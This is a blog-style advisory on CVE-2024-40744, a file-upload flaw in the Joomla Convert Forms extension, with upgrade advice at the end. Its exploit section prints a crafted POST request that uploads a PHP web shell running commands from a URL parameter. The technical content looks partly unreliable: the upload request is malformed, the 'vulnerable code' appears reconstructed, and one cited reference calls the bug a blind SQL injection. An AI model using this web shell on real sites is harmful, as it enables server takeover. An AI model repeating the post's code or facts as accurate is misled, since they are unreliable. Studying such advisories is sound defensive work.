In this long read post, we're going to examine a critical security vulnerability, assigned with CVE-2024-40744, present in the Convert Forms component for Joomla in versions before 4.4.8. This vulnerability allows attackers to carry out unrestricted file uploads, which can lead to remote code execution and compromise the targeted Joomla site's security. We'll dive deep into the vulnerability details, demonstrate how it can be exploited, and provide the necessary fix information to ensure your Joomla site is safe from this attack.
Vulnerability Details
CVE-2024-40744 is a security bypass issue in the Convert Forms component, which powers forms and submission functionality on many Joomla-powered sites. Versions before 4.4.8 suffer from a design flaw that allows an unauthorized attacker to bypass security mechanisms and upload arbitrary files on the server, including malicious PHP files. Once a PHP file is uploaded, the attacker can execute arbitrary code on the server, compromising the site's security and potentially gaining further control over the server.
Here's a code snippet that demonstrates the vulnerability
// Vulnerable code in Convert Forms before 4.4.8
public function upload()
{
// ... (omitted code for brevity)
// File validation
if ($file['size'] > $maxFilesize || $file['error'])
{
throw new Exception(JText::_('COM_CONVERTFORMS_ERROR_FILE_TOO_LARGE'));
}
// Subfolder creation
$folder = $upload_path . DIRECTORY_SEPARATOR . 'user_' . JFactory::getUser()->id;
if (!JFolder::create($folder))
{
throw new Exception(JText::_('COM_CONVERTFORMS_ERROR_FAILED_TO_CREATE_FOLDER'));
}
$destination = $folder . DIRECTORY_SEPARATOR . $file['name'];
if (!JFile::upload($file['tmp_name'], $destination))
{
throw new Exception(JText::_('COM_CONVERTFORMS_ERROR_UNABLE_TO_UPLOAD_FILE'));
}
// Return the uploaded file information
return array(
'url' => JURI::root() . 'images/com_convertforms/uploads/user_' . JFactory::getUser()->id . '/' . $file['name'],
'path' => $destination,
);
}
The above code is handling file uploads, but it lacks proper validation on the file type, opening the door for attackers to upload arbitrary files, such as a .php file containing malicious code.
Exploit Details
To exploit this vulnerability, an attacker can initiate a POST request to the vulnerable Joomla site with a malicious PHP file crafted to execute arbitrary code.
Here's an example of a crafted POST request exploiting this vulnerability
POST /index.php?option=com_convertforms&task=file.upload HTTP/1.1
Content-Disposition: form-data; name="file"; filename="malicious.php"
Content-Type: application/x-php
<?php
// Malicious PHP code
system($_GET['cmd']);
?>
By executing the above request, an attacker uploads a "malicious.php" file to the server. This file can then be accessed via a URL to execute arbitrary commands on the server, effectively compromising the Joomla site.
Mitigation and Remediation
The vulnerability has been patched in Convert Forms version 4.4.8. To secure your Joomla site, ensure that you are running Convert Forms version 4.4.8 or later. You can download the latest version of Convert Forms from their official website (https://www.tassos.gr/joomla-extensions/convert-forms).
Conclusion
CVE-2024-40744 is a severe security vulnerability present in Convert Forms component for Joomla in versions before 4.4.8, allowing attackers to bypass security mechanisms and upload arbitrary files. To mitigate this vulnerability, ensure that you are using the latest version of Convert Forms and follow security best practices to protect your Joomla site from this and future vulnerabilities.
References
- Convert Forms Official Website: https://www.tassos.gr/joomla-extensions/convert-forms
- Joomla! Vulnerable Extensions List: https://vel.joomla.org/resolved/2491-convert-forms-com-convertforms-4-4-8-blind-sql-injection
- NIST National Vulnerability Database: https://nvd.nist.gov/vuln/detail/CVE-2024-40744
Timeline
Published on: 12/04/2024 15:15:11 UTC
Last modified on: 12/25/2024 04:34:33 UTC